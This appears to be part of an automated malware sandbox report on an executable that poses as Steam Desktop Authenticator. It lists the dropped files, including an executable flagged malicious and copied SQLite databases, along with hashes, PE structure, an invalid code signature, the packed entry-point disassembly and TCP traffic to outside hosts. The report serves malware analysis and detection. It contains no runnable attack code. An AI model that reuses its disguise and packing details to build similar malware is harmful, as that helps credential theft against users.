                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBF.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFC0.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):979968
                                                                                                                                                                            Entropy (8bit):7.361382512565047
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
                                                                                                                                                                            MD5:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            SHA1:BB965F2D97B19ED01702B8182BBD870670A1E75B
                                                                                                                                                                            SHA-256:20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                                                                                                                                                                            SHA-512:BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Nb2HQZZDIf.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: P58w6OezJY.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\field
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                            Entropy (8bit):4.529003957966892
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
                                                                                                                                                                            MD5:EC6AAE2BB7D8781226EA61ADCA8F0586
                                                                                                                                                                            SHA1:D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
                                                                                                                                                                            SHA-256:B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
                                                                                                                                                                            SHA-512:AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                            Entropy (8bit):7.218310131625728
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                            File name:kS2dqbsDwD.exe
                                                                                                                                                                            File size:598944
                                                                                                                                                                            MD5:888ab99280a081717ec5c5749266d1bd
                                                                                                                                                                            SHA1:3a071aeadd42c1232ff2878d2adf7f1e4a629180
                                                                                                                                                                            SHA256:e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
                                                                                                                                                                            SHA512:85b78c1489ed6a8fd375380595f3597968d026de0bd0cfe58e26cd4d6590f1d171626c0a8f677cc71d7405e5e647ede4692e615fd63a63597db724da15dc2299
                                                                                                                                                                            SSDEEP:12288:67iuUvUF2JURoyPa5UA5/zfqb3HtwQG99:67iuUv8Paz/2ZwJ99
                                                                                                                                                                            File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#.................R..........@.......................................... ...@.................................................X............p..4_.......'.................

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:d2ae86929a86a2c2

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x14013c352
                                                                                                                                                                            Entrypoint Section:.MPRESS2
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                                                                            Time Stamp:0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:2
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:2
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:2
                                                                                                                                                                            Import Hash:caa5e6a2892587c2324418efee31c648

                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:A32549731E28A0F6BA85C9B2C50FE589
                                                                                                                                                                            Thumbprint SHA-1:834F29A60152CE36EB54AF37CA5F8EC029ECCF01
                                                                                                                                                                            Thumbprint SHA-256:E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
                                                                                                                                                                            Serial:00972FADA2BC13FA55C5D47FEF56AEE0F4

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            push ebx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push edx
                                                                                                                                                                            inc ecx
                                                                                                                                                                            push eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            lea eax, dword ptr [00000ADEh]
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov esi, dword ptr [eax]
                                                                                                                                                                            dec eax
                                                                                                                                                                            add esi, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub eax, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov edi, esi
                                                                                                                                                                            lodsw
                                                                                                                                                                            shl eax, 0Ch
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            push eax
                                                                                                                                                                            lodsd
                                                                                                                                                                            sub ecx, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            add esi, ecx
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            push edi
                                                                                                                                                                            inc esp
                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                            dec ecx
                                                                                                                                                                            mov al, byte ptr [ecx+edi+06h]
                                                                                                                                                                            mov byte ptr [ecx+esi], al
                                                                                                                                                                            jne 00007F491C93DB07h
                                                                                                                                                                            inc ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push ebp
                                                                                                                                                                            sub eax, eax
                                                                                                                                                                            lodsb
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            shr ecx, 04h
                                                                                                                                                                            push ecx
                                                                                                                                                                            and al, 0Fh
                                                                                                                                                                            push eax
                                                                                                                                                                            lodsb
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            add cl, byte ptr [esp]
                                                                                                                                                                            push eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ebp, FFFFFD00h
                                                                                                                                                                            dec eax
                                                                                                                                                                            shl ebp, cl
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            shl eax, 20h
                                                                                                                                                                            dec eax
                                                                                                                                                                            add ecx, eax
                                                                                                                                                                            pop eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ebx, esp
                                                                                                                                                                            dec eax
                                                                                                                                                                            lea esp, dword ptr [esp+ebp*2-00000E70h]
                                                                                                                                                                            push eax
                                                                                                                                                                            push ecx
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub ecx, ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ecx, esp
                                                                                                                                                                            push ecx
                                                                                                                                                                            mov dx, word ptr [edi]
                                                                                                                                                                            shl edx, 0Ch
                                                                                                                                                                            push edx
                                                                                                                                                                            push edi
                                                                                                                                                                            dec esp
                                                                                                                                                                            lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                            dec ecx
                                                                                                                                                                            lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                            push esi
                                                                                                                                                                            pop edx
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                            call 00007F491C93DBDDh
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov esp, ebx
                                                                                                                                                                            pop ebp
                                                                                                                                                                            inc ecx
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop edx
                                                                                                                                                                            sub edx, 00001000h
                                                                                                                                                                            sub ecx, ecx
                                                                                                                                                                            cmp ecx, edx
                                                                                                                                                                            jnc 00007F491C93DB5Ch
                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                            lodsb
                                                                                                                                                                            inc ecx
                                                                                                                                                                            cmp al, FFh
                                                                                                                                                                            jne 00007F491C93DB1Fh
                                                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                                                            and al, FDh
                                                                                                                                                                            cmp al, 15h
                                                                                                                                                                            jne 00007F491C93DAFDh
                                                                                                                                                                            lodsb
                                                                                                                                                                            inc ecx
                                                                                                                                                                            jmp 00007F491C93DB29h
                                                                                                                                                                            cmp al, 8Dh
                                                                                                                                                                            jne 00007F491C93DB1Fh
                                                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                                                            and al, C7h

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13c0000x358.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x13d0000x2b508.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1070000x5f34.MPRESS1
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x8fc000x27a0.MPRESS1
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x13ce500x28.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x13c1180xd0.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .MPRESS10x10000x13b0000x63400False1.00031240161data7.99951858505IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .MPRESS20x13c0000xe800x1000False0.50732421875data5.63658087631IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x13d0000x2b5080x2b600False0.124651026657data3.38878491057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                            RT_ICON0x13d0f00x1ffbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                            RT_ICON0x13f1140x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                            RT_ICON0x14f9640x94a8dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x158e340x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x1592c40x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x1597540x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x159be40x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x159d340x5488dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x15f1e40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608EnglishUnited States
                                                                                                                                                                            RT_ICON0x1634340x25a8dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x165a040x10a8dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x166ad40x988dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x1674840x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_MENU0x13ab8c0x2c8emptyEnglishUnited States
                                                                                                                                                                            RT_DIALOG0x13ae540xe8emptyEnglishUnited States
                                                                                                                                                                            RT_ACCELERATOR0x13af3c0x48emptyEnglishUnited States
                                                                                                                                                                            RT_RCDATA0x13af840x103emptyEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167a6c0x84dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b180x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b540x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b900x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167bcc0x14dataEnglishUnited States
                                                                                                                                                                            RT_VERSION0x167c200x41edata
                                                                                                                                                                            RT_MANIFEST0x1680800x487ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32GetModuleHandleA, GetProcAddress
                                                                                                                                                                            WSOCK32.dllWSACleanup
                                                                                                                                                                            WINMM.dllmixerOpen
                                                                                                                                                                            VERSION.dllVerQueryValueW
                                                                                                                                                                            COMCTL32.dllImageList_Create
                                                                                                                                                                            PSAPI.DLLGetModuleBaseNameW
                                                                                                                                                                            USER32.dllGetDC
                                                                                                                                                                            GDI32.dllBitBlt
                                                                                                                                                                            COMDLG32.dllGetOpenFileNameW
                                                                                                                                                                            ADVAPI32.dllRegCloseKey
                                                                                                                                                                            SHELL32.dllDragFinish
                                                                                                                                                                            ole32.dllCoGetObject
                                                                                                                                                                            OLEAUT32.dllSafeArrayGetLBound

                                                                                                                                                                            Version Infos

                                                                                                                                                                            DescriptionData
                                                                                                                                                                            Translation0x0000 0x04b0
                                                                                                                                                                            LegalCopyrightCopyright 2017
                                                                                                                                                                            Assembly Version1.0.10.0
                                                                                                                                                                            InternalNameSteam Desktop Authenticator.exe
                                                                                                                                                                            FileVersion1.0.10
                                                                                                                                                                            CompanyName
                                                                                                                                                                            LegalTrademarks
                                                                                                                                                                            CommentsDesktop implementation of Steam's mobile authenticator app
                                                                                                                                                                            ProductNameSteam Desktop Authenticator
                                                                                                                                                                            ProductVersion1.0.10
                                                                                                                                                                            FileDescriptionSteam Desktop Authenticator
                                                                                                                                                                            OriginalFilenameSteam Desktop Authenticator.exe

                                                                                                                                                                            Possible Origin

                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jul 22, 2021 11:42:58.756686926 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.825814962 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.825999975 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.842880011 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.912139893 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914864063 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914935112 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914988041 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.915002108 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915035963 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915039062 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.915071011 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915173054 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.055423975 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.125174999 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.125299931 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.166641951 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.241749048 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.241862059 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.394864082 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.436276913 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.436394930 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.436954975 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.479173899 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480345964 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480372906 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480423927 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.480467081 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.498867035 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.540132999 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.540498972 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.540566921 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.541446924 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.585441113 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.683588028 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.683687925 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.757873058 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.801004887 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.801134109 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.801935911 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.845109940 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.023966074 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.023997068 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.024015903 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.024127007 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.054200888 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.054538965 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.054663897 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.097695112 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.187654018 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.187798977 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.189469099 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.233757019 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389164925 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389215946 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389240026 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.389286995 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.416637897 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.416724920 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.483721018 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.651829958 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.652004004 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.653352022 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.820758104 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820804119 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820842028 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820880890 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820909977 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820987940 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821106911 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821405888 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.821446896 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.821504116 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821556091 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.845171928 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.857933044 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.858073950 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.012918949 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.012980938 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.013000965 CEST4434971552.217.201.169192.168.2.3
